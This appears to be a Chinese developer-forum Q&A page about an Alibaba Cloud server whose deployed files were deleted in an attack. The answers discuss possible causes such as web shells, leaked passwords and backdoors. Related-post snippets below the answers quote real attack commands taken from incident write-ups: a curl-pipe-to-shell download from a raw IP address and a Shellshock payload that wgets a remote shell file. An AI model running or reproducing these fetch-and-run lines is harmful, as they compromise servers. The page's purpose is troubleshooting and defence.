2 langfei520 langfei520 于 2016.02.25 00:58 提问

阿里云服务器被攻击导致被文件删除

使用阿里云部署web项目服务器(tomcat + mysql+window2014),项目刚上线没多久,就被黑客攻击,部署的项目文件全部被删除,请问大牛,能分析下黑客是通过什么途径办到的,该怎么去防护,能提供解决思路就更好了。急~

4个回答

caozhy
caozhy   Ds   Rxr 2016.02.25 06:11

不知道你是用的什么语言,如果是php一类的脚本语言,如果黑客上传一个精心构造的脚本文件,包含删除的脚本,并且在某种条件下触发执行,就可以删除你的文件。这种攻击方式叫做web shell攻击。
http://www.2cto.com/Article/201301/181654.html

不知道"window2014"是什么东西,是Windows么?微软没有发布过什么Windows 2014,也不知道你从哪里找来的,如果你的操作系统镜像是自己准备的山寨盗版,那么可能被植入后门。另外服务器本身也可能在你操作和运行的过程中感染恶意程序,甚至变成可以被操作的“肉鸡”,那么黑客直接登录服务器就可以胡作非为。

你的管理员密码是否泄露,如果你使用的密码组合太短,或者使用弱口令,那么会被黑客猜测出来。另外你一个密码在多个场合使用,也可能因为别的地方泄露而造成黑客知道你的密码。你的同事或者员工也可能恶意破坏系统,或者对系统误操作误删除,并且伪装成黑客攻击。

另外还有注入跨站攻击、脚本注入、sql注入等很多攻击方式,如果你的项目程序本身不是你开发的,那么开发者也可能加入后门。

既然你用的是阿里云的服务器,你首先要做的是电话联系他们的客服,让他们帮你排查,调出系统登录日志、数据库日志、http日志等等分析。如果攻击很严重,也应该及时报警。

langfei520
langfei520 不好意思,写错了window server 2012 版
2 年多之前 回复
wen_wxpk
wen_wxpk   2016.02.25 08:39

楼上正解,window2014感觉很牛逼。。

dcxy0
dcxy0   Ds   Rxr 2016.02.25 09:53

window2014完全没听过。。。

henuyx
henuyx   2016.02.25 10:16

应该还有其他人有登陆权限,或者你的账号密码泄露了。这种问题一看就是恶意删除,黑客或病毒一般不会恶意删除文件吧。

Csdn user default icon
上传中...
上传图片
插入图片
准确详细的回答,更有利于被提问者采纳,从而获得C币。复制、灌水、广告等回答会被删除,是时候展现真正的技术了!
其他相关推荐
重磅-记一次惊心动魄的阿里云服务器被入侵过程定位
现象 某天登陆自己的阿里云服务器,发现有很多命名奇怪的进程:  定位步骤一:查看进程文件位置 通过命令 ll /proc/pid 查看进程文件exe执行路径,打开后整个人都惊呆了!mysql目录和mysql/data目录多了很多奇怪的so文件和可执行文件: 定位步骤二:立马kill掉进程和文件 批量kill进程:介绍一个在stackoverfl
阿里云window服务器检查恶意攻击方法
当我们在使用服务器的时候,很容易就会被黑客入侵,从而用你的服务器去攻击别人的网站或者系统,当这个时候,我们如何去检查和排除是哪些进程的恶意操作呢,下面来介绍: 1.打开cmd命令行,输入netstat查看哪些网络连接正在运作。 2.记住第一个连接的端口号,输入一下命令查找使用这个端口的进程pid: netstat -ano | findstr [port] 3.根据进程的pid查
服务器由于redis未授权漏洞被攻击
服务器由于redis未授权漏洞被攻击 昨天阿里云拦截到了一次异常登陆,改了密码后就没有管他, 今天阿里云给我发消息说我的服务器可能被黑客利用,存在恶意发包行为。。。。。。。 不过我不打算只是单纯的重置系统,经过一系列的查找原因后,发现被攻击的原因是我的redis没有设置登陆密码(redis 默认情况下,没有配置登陆密码,任意用户可以登录),被黑客利用然后获取到了我的root权
记一次阿里云黑客攻击事件
这几天服务器一直发生异常行为,阿里云报警如下:根据执行命令:/bin/sh -c curl -fsSL http://165.225.157.157:8000/i.sh | sh 可知道,后台某个进程一直从这个美国的IP地址下载sh可执行文件访问这个地址:http://165.225.157.157:8000/i.sh看到执行语句如下:大概明白,意思是定时从这个地址获取sh可执行文件,然后添加到定...
服务器经常被攻击
原因:部署在服务器上的网站最近经常访问不了,客户端也连接不上服务器。服务器是托管在电信机房,机房管理员给我的答复是服务器处于宕机状态。 分析:因为是对服务器或者某个网站不断访问,才导致服务器宕机,查看安全狗服务器软件,发现一个ddos攻击1433端口,如果一直被攻击了,严重影响公司业务 措施:扫描整个服务器文件查杀病毒,排查哪个网站受到攻击,关闭1433端口。限制电脑登录服务器,只有这
redis配置不当可直接导致服务器被控制
http://www.secpulse.com/archives/40406.html#respond 预警简述: 2014年的时候安全脉搏首发《利用redis写webshell》《redis写shell的小技巧》 近日我们监测到antirez.com曝出redis存在高危安全风险,攻击者利用该风险可直接控制业务服务器,导致被入侵。 目前已监测到攻击者正在利用该漏洞攻击
服务器可能遭受攻击汇总
服务器可能遭受的攻击 1.短信消耗   平台注册在不输入验证码的时候即可点击免费获取验证码,黑客如果通过动态IP反复输入大量手机号点击获取验证码。将导致短信短时间内大量消耗。   2.用户名输入的时候查询角色   系统登入的时候输入用户名,系统会自动查询数据库来确认角色信息,当黑客通过大量用户名输入的时候会导致数据库资源被占满导致正常的访问无法进行。   3.ddos   近几年
记一次服务器被攻击处理
基本情况:服务器没有表象的被攻击征兆,只是偶然登录阿里云控制台,发现主机cpu一个月来占用率都是100%; 于是ssh上服务器执行命令top -c //看看哪些占用cpu比较高发现有两个mysql用户的进程各占用47%左右,这两个几乎就占用了全部的cpu。想着服务器上的数据库已经迁移到了阿里云,所以就kill掉他们,然后又查看cpu占用,发现依然有两个这样的进行,只是pid改变了,于是我关闭了my
阿里云ECS被攻击
今天发现阿里云ECS被攻击了,记录一下,/1.1 Match1:{ :;};/usr/bin/perl -e 'print .content-type: text/plain.r.n.r.nxsuccess!.;system(.wget http://lbinvestment.com/shell.txt -o /tmp/shell.txt;curl -o /tmp/shell.txt http:/
阿里云服务器被挖矿minerd入侵的解决办法
上周末,更新易云盘的时候,发现阿里云服务器CPU很高,执行 top 一看,有个进程minerd尽然占用了90%多的CPU, 赶紧百度一下,查到几篇文章都有人遇到同样问题 Hu_Wen遇到的和我最相似,下边是他的解决办法 http://blog.csdn.net/hu_wen/article/details/51908597 但我去查看启动的服务,尽然没有 lady 这个服务。 找